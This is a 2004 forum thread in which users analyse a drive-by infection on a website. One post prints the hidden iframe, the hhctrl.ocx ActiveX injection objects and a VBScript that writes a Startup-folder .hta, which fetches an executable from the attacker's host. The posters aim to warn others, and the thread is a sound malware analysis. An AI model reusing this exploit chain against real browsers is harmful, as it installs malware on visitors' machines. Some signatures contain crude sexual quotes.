19072 Members
14 Forums
40358 Topics
614269 Posts
Max Online: 1680 @ Yesterday at 07:10 AM
|
|
|
#76083 - 12/27/04 01:23 PM
lukeisback
|
Porn Jesus
Registered: 09/23/04
Posts: 10321
|
Can someone else with computer knowledge hit www.lukeisback.com and see if something there brings up a slew of security warnings? I'm thinking that one of his advertisers has nazi infiltrators. It's trying to replace a file called c:\windows\system\hhctrl.ocx I know this is offtopic for the cage but since we're all fascinated with his site, and know he reads the cage, maybe he can get it fixed. (I didn't let lukeisback replace any files on my computer).
|
|
Top
|
|
|
|
|
#76084 - 12/27/04 02:09 PM
Re: lukeisback
|
Kurt Lackwood's Fluffer
Registered: 10/09/04
Posts: 1176
|
Quote:
Can someone else with computer knowledge hit www.lukeisback.com and see if something there brings up a slew of security warnings? I'm thinking that one of his advertisers has nazi infiltrators.
It's trying to replace a file called c:\windows\system\hhctrl.ocx
I know this is offtopic for the cage but since we're all fascinated with his site, and know he reads the cage, maybe he can get it fixed. (I didn't let lukeisback replace any files on my computer).
hhctrl.ocx is the HTML Help ActiveX Control. Like most ActiveX controls it has it's legitimate uses, but the whole ActiveX system is a security nightmare, relying on code being downloaded from "trustworthy" sites (thanks Microsoft.)
I didn't get the warning because I use Firefox, which purposefully ignores the whole ActiveX mess. I haven't missed it.
A quick dig through the source of Luke's site reveals this line at the very end to be the offender:
<iframe src="http://www.outdoornewswire.com/iesploit/spatch.htm" frameborder=0 width=0 height=0 marginwidth=0 marginheight=0 scrolling=no></iframe>
Which references this code hosted on outdoornewswire.com:
<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://www.outdoornewswire.com/iesploit/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
which references this vbscript code hosted in the text file writehta.txt on outdoornewswire.com:
on error resume next
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.outdoornewswire.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs = CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
I don't know enough to figure out exactly what it all does, but I don't like the look of it.
_________________________
"If I were a guy, not swallowing would be a deal breaker. So what if you cook and clean? I can get a maid for that." - Gia Jordan
|
|
Top
|
|
|
|
|
#76085 - 12/27/04 03:01 PM
Re: lukeisback
|
Kurt Lackwood's Fluffer
Registered: 10/09/04
Posts: 1176
|
UPDATE: THIS IS DEFINATELY MALICIOUS CODE!!!!!
I visited the lukeisback.com using IE, expecting to see warnings like Bornyo, but didn't get any - just a meaningless pop-up. I then found that it had created the file:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta
.hta files are HTML Applications. This one downloads a file from http://www.outdoornewswire.com/iesploit/sysprog.exe and saves it as C:\calc.exe. Thankfully, I spotted this before I rebooted my system and gave it a chance to run.
The frightening thing is that I'm running a fully patched, up to date Win XP SP2. This appears to be an unpatched exploit in the wild.
I found a write-up on the vulnerability here. Looks like someone took this "proof of concept" and adapted it for malicious purposes.
Everyone, check your system for these:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta
C:\calc.exe
If they exist, DELETE THEM. Virus checkers might not pick up something so new.
I'm emailing Luke and outdoornewswire.com to let them know they're own3d.
_________________________
"If I were a guy, not swallowing would be a deal breaker. So what if you cook and clean? I can get a maid for that." - Gia Jordan
|
|
Top
|
|
|
|
|
#76086 - 12/27/04 03:20 PM
Re: lukeisback
|
Porn Jesus
Registered: 09/23/04
Posts: 10321
|
Thanks for the info Ivor. I guess the only reason my computer caught it is because that was my office system, still on Win98 with all settings on paranoid. I will point out that calc.exe is also the filename of the little Windows calculator program, but it shouldn't be located in the root drive of " C:\ " normally.
Anyway, I apologize to Garfield and Killttboy for posting something so far above their heads, but since Luke is getting all his updates through this forum lately I figured this was the quickest way to get the word to him.
Thanks again.
|
|
Top
|
|
|
|
|
#76088 - 12/27/04 03:53 PM
Re: lukeisback
|
Porn Jesus
Registered: 09/23/04
Posts: 10321
|
Quote:
Luke responded immediately to my email, he's already pulled the offending html code line from his site.
Once again, the Proprietors of this site and our enabler Smelly Monkey, with the help of a loyal user, Ivor, save Luke from mucho embarassment, and the porno world at large from a very dangerous virus  .
How many folks at ADT are talking about this? 
|
|
Top
|
|
|
|
|
#76089 - 12/27/04 05:09 PM
Re: lukeisback
|
Porn Jesus
Registered: 08/03/03
Posts: 5849
Loc: TX, USA
|
Excellent analysis Ivor. I haven't used Win9x in several years, but I think this would try to infect but fail. It's aimed at NT - NT4, NT5/Windows 2000 or NT5.1 Windows XP.
_________________________
"If they can't picture me with a knife, forcing them to strip in an alley, I don't want any part of it. It's humiliating." - windsock
|
|
Top
|
|
|
|
|
#76091 - 12/27/04 07:54 PM
Re: lukeisback
|
Porn Jesus
Registered: 09/23/04
Posts: 10321
|
Luke fixed it and gave top billing to Ivor. Apparently he WAS "own3d". Thanks again to Ivor, you sussed it out. www.lukeisback.comProprietors, notice the dis he gave you in his quote- he de-capped the "P". It wasn't proper English but was meant as a sign of respect.
|
|
Top
|
|
|
|
|
|
0 registered (),
865
Guests and
3
Spiders online. |
|
Key:
Admin,
Global Mod,
Mod
|
|
|
Previous Topic
Index
